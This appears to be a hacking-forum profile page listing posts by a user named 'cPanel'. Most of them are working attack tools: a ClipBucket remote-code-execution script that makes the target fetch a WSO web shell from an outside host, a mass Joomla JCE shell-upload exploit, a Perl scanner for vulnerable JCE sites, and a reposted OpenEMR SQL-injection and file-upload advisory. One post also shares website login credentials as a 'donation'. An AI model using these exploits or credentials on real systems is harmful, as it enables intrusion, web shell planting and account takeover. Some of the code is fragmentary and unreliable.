Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

Posts posted by cPanel

  1. [New Domain] bridgewaterbaptist.com - test@bridgewaterbaptist.com - test

    [New Domain] fdaregistro.com - test@fdaregistro.com - test

    [New Domain] natalephotography.com - test@natalephotography.com - test

    [New Domain] eqraa.com - test@eqraa.com - test

    [New Domain] gruporesidencial.com - test@gruporesidencial.com - test

    [New Domain] elbarbary.sd - test@elbarbary.sd - test123

    [New Domain] greece-car-rentals.gr - test@greece-car-rentals.gr - test123

    [New Domain] thepeaches.com - test@thepeaches.com - test

    Pt cine doreste ! o Mica donatie :) sper sa mai fie bune

  2. #####################################
    # Exploit Title: OpenEMR 4.1.1 Patch 14 Multiple Vulnerabilities
    # Date: Sep 17 2013
    # Exploit Author: xistence < xistence[at]0x90[.]nl >
    # Vendor Homepage: [url=http://www.open-emr.org]OpenEMR Project[/url]
    # Tested on: CentOS 5.9 32-bit
    # Affected Version : 4.1.1 Patch 14 and lower
    # Fix: Upgrade to OpenEMR 4.1.2
    # Software details:
    # OpenEMR is a Free and Open Source electronic health records and medical practice management application that can run
    # Windows, Linux, Mac OS X, and many other platforms. OpenEMR is ONC Complete Ambulatory EHR certified and is one of
    # the most popular open source electronic medical records in use today. OpenEMR is supported by a strong community of
    # volunteers #and professionals all with the common goal of making OpenEMR a superior alternative to its proprietary
    # The OpenEMR community is dedicated to guarding OpenEMR's status as a free, open source software solution for #
    # and is dedicated to maintaining a spirit of openness, kindness and cooperation.

    [ SQL Injection ]

    [0x01] - The "authProvider" parameter in the "interface/main/main_screen.php" POST script is
    vulnerable to SQL Injection. A valid "authPass" password is needed before injection is possible (hash below is
    the default password "pass")

    POST /openemr/interface/main/main_screen.php?auth=login&site=default HTTP/1.1
    Host: <IP>
    Referer: http://<IP>/openemr/interface/login/login.php
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 135


    The POST request below could be used to retrieve passwords from other users and gain higher privileges (and after that
    upload a shell)

    [0x02] - The "form_pubid" parameter in the "interface/new/new_comprehensive_save.php" script is
    vulnerable to SQL Injection.

    POST /openemr/interface/new/new_comprehensive_save.php HTTP/1.1
    Host: <IP>
    Referer: http://<IP>/openemr/interface/new/new.php
    Cookie: OpenEMR=blahblahblah
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 286


    [0x03] - The "set_pid" parameter in the "interface/patient_file/summary/demographics.php" script is
    vulnerable to SQL Injection.

    [ Arbitrary file upload ]

    [0x01] - It's possible to upload any file after being authenticated.

    POST /openemr/interface/super/manage_site_files.php HTTP/1.1
    Host: <IP>
    Referer: http://<IP>/openemr/interface/super/manage_site_files.php
    Cookie: OpenEMR=blahblahblah
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------6745387234061449481375110870
    Content-Length: 355

    Content-Disposition: form-data; name="form_image"; filename="pwned.php"
    Content-Type: text/php

    <?php phpinfo(); ?>
    Content-Disposition: form-data; name="bn_save"


  3. ###
    # __________.__ _________ _________
    # \__ ___/| |__ ____ \_ ___ \_______ ______ _ ________ \_ ___ \_______ ______ _ __
    # | | | | \_/ __ \ / \ \/\_ __ \/ _ \ \/ \/ / ___/ / \ \/\_ __ \_/ __ \ \/ \/ /
    # | | | Y \ ___/ \ \____| | \( <_> ) /\___ \ \ \____| | \/\ ___/\ /
    # |____| |___| /\___ > \______ /|__| \____/ \/\_//____ > \______ /|__| \___ >\/\_/
    # \/ \/ \/ \/ \/ \/
    #[url=http://thecrowscrew.org]-=[ The Crows Crew Official Website ]=-[/url]
    # Exploit title : ClipBucket Remote Code Execution Vulnerability
    # Author : Gabby
    # Dork = use ur brain
    # Vendor Site : [url=http://clip-bucket.com/]ClipBucket – Free Video Sharing Website Script, Youtube, Daily-motion Clone, PHP Video Script, Media Sharing CMS, Best PHP Solution for Social Networking.[/url]
    # Software Download : [url=http://sourceforge.net/projects/clipbucket/]ClipBucket | Free software downloads at SourceForge.net[/url]
    $options = getopt('t:n:');
    if(!isset($options['t'], $options['n']))
    die("\n [+] Simple Exploiter ClipBucket by Gabby [+] \n Usage : php clip.php -t [url=http://target.com]Target : Expect More. Pay Less.[/url] -n bie.php\n

    -t [url=http://target.com]Target : Expect More. Pay Less.[/url] = Target mu ..
    -n bie.php = Nama file yang mau kamu pakai...\n\n");

    $target = $options['t'];
    $nama = $options['n'];
    $shell = "{$target}/admin_area/charts/tmp-upload-images/{$nama}";
    $target = "{$target}/admin_area/charts/ofc-library/ofc_upload_image.php?name={$nama}";
    $data = '<?php
    system("wget [url=http://gabby.ga/shell/wso.txt;]CirtexHosting - Site Suspended[/url] mv wso.txt bie.php");
    fclose ( $handle );
    $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
    'Content-Type: text/plain');
    echo "============================================ \n";
    echo ": Simple Exploiter ClipBucket by Gabby :\n";
    echo "============================================ \n\n";
    echo "[+] Upload Shell ke : {$options['t']}\n";
    $handle = curl_init();
    curl_setopt($handle, CURLOPT_URL, $target);
    curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
    curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
    $source = curl_exec($handle);
    if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
    echo "[+] Exploit Sukses,.. \n";
    echo "[+] {$shell}\n";
    die("[-] Exploit Gagal,.. \n");


    see on ss :
    1. [url]http://i.imgur.com/SZGVraC.png[/url]
    2. [url]http://i.imgur.com/1X0WzeH.png[/url]

    Thanks to :
    Catalyst71, kit4r0, 777r, ovanIsmycode, walangkaji, y0g4, my "Dad", my sista Wii, cW3 G4pt3K,
    Red-x, Vanda, Deb, Sultan, Meninbox, n all my luvly friend,..
    Greets to :
    Yogyacarderlink, SurabayaBlackhat,..^^

  4. <?             	
    # Priv 2013/02
    <html><body bgcolor="#000000" link="#FF0000" alink="#FF0000" vlink="#FF0000"> <center><form action="" method="post" enctype="multipart/form-data">
    <font color="#C0C0C0" size="7">JCE Joomla Extension Remote File Upload - Priv8</font><p><input type="text" name="shellname" value="a.php"><br><input type="file" name="datafile"><br><textarea cols=50 rows=20 name="sites" >
    <br><input type="submit" name="submit"></p>

    echo "<table border=1 height=100 widh=200 >";

    foreach($sites as $sites2){
    ################### ????? ??????? ????? ????? ##################
    if($sites2['port']==""){ $port=80;}
    else {$port=$sites2['port'];}
    if(!file_get_contents($_FILES['datafile']['tmp_name'])){die ('<h1><font color="red">cu de rola cade a porra da shell</font></h1>');}

    ################### ??????? ???????? ##################
    if(!$connect){echo "<tr><td><font color='white'>http://$siite$path</font></td><td><font color='white'>No Response</font></td><td><a href='http://www.correspondances-manosque.org/cache/jce.php'><font color='white'>Try With Single</font></a></td></tr>"; }

    ################### ??? ???? ??????? gif ##################
    $content = "GIF89a1\n";
    $content .= file_get_contents($_FILES['datafile']['tmp_name']);
    $data = "-----------------------------41184676334\r\n";
    $data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
    $data .= "/\r\n";
    $data .= "-----------------------------41184676334\r\n";
    $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
    $data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
    $data .= "-----------------------------41184676334\r\n";
    $data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
    $data .= "0\r\n";
    $data .= "-----------------------------41184676334\r\n";
    $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"0day.gif\"\r\n";
    $data .= "Content-Type: image/gif\r\n\r\n";
    $data .= "$content\r\n";
    $data .= "-----------------------------41184676334\r\n";
    $data .= "0day\r\n";
    $data .= "-----------------------------41184676334\r\n";
    $data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
    $data .= "upload\r\n";
    $data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";
    $packet = "POST ".$path."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";
    $packet .= "Host: ".$siite."\r\n";
    $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
    $packet .= "Accept-Language: en-us,en;q=0.5\r\n";
    $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    $packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
    $packet .= "Connection: Close\r\n";
    $packet .= "Proxy-Connection: close\r\n";
    $packet .= "Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n";
    $packet .= $data;
    ################## ?????????????????? ????? ?????? ############

    ############### ?????????? ?????? ???? ??? .php #################
    $packet = "POST ".$path."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
    $packet .= "Host: ".$siite."\r\n";
    $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n";
    $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $packet .= "Accept-Language: en-US,en;q=0.8\r\n";
    $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
    $packet .= "Accept-Encoding: deflate\n";
    $packet .= "X-Request: JSON\r\n";
    $packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";
    $ren ="json={\"fn\":\"folderRename\",\"args\":[\"/0day.gif\",\"$shellname\"]}";
    $packet .= "Content-Length: ".strlen($ren)."\r\n\r\n";
    $packet .= $ren."\r\n\r\n";
    ############################ ?????? ?? ???? ????? ###########################################################################
    $packet = "Head ".$path."https://rstforums.com/forum/images/stories/".$shellname." HTTP/1.1\r\n";
    $packet .= "Host: ".$siite."\r\n";
    $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";

    while(!feof($connect2)){ $html.=fgets($connect2);}
    if(stristr($html,'200 OK')!=true && !eregi('GIF89a1',$tester)){ echo "<tr><td><font color='red'>http://$siite$path</font></td><td><font color='red'>Exploit Failed</font></td><td><a href='http://www.correspondances-manosque.org/cache/jce.php'><font color='red'>Try With Single</a></font></td></tr>";}
    else{ echo "<tr><td><font color='green'>http://$siite$path</font></td><td><font color='green'>Exploit Succes</font></td><td><a href='$finalsiite'><font color='green'>$finalsiite2</a></font></td></tr>"; }

    echo "</table>";

  5. #!/usr/bin/perl

    use HTTP::Request;

    use LWP::Simple;

    use HTTP::Request::Common;

    print "[+] Private Jce checkeer maded by cPanel \n";

    print "[+] Chose File:";



    open (file, "<$file") || die "[-] Can't open the List of site file !";

    my @file = <file>;

    close file;

    foreach $webs (@file) {

    chomp $webs;

    $site = $webs;

    print "Checking $site \n";

    my $jes1 = "http://".$site."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b";

    my $cik = &get($jes1);

    if ($cik =~ /{"result":null,"error":"No function call specified!"}/g) {

    print "[+]Checking $site Success \n";


    print BEN "$site\n";


    } else {

    print "[-]Checking $site Failed \n";


    print BEN "$site\n";

    close(BEN); }


  6. Today romanian torrent traker "filelist.ro" was shutted down been hosted on PRQ Company, the Swedish hosting company. All sites hosted on the 80.88./19 net are currently unavailable, including but not limited to the torrent sites torrenthound.com, linkomanija and tankafetast, release blog RLSLOG, and the sports streaming sites atdhenet, hahasport, sportlemon and stopstream. Private BitTorrent sites that use PRQ’s services are also affected.

    Deci se termina pomana...

  • Create New...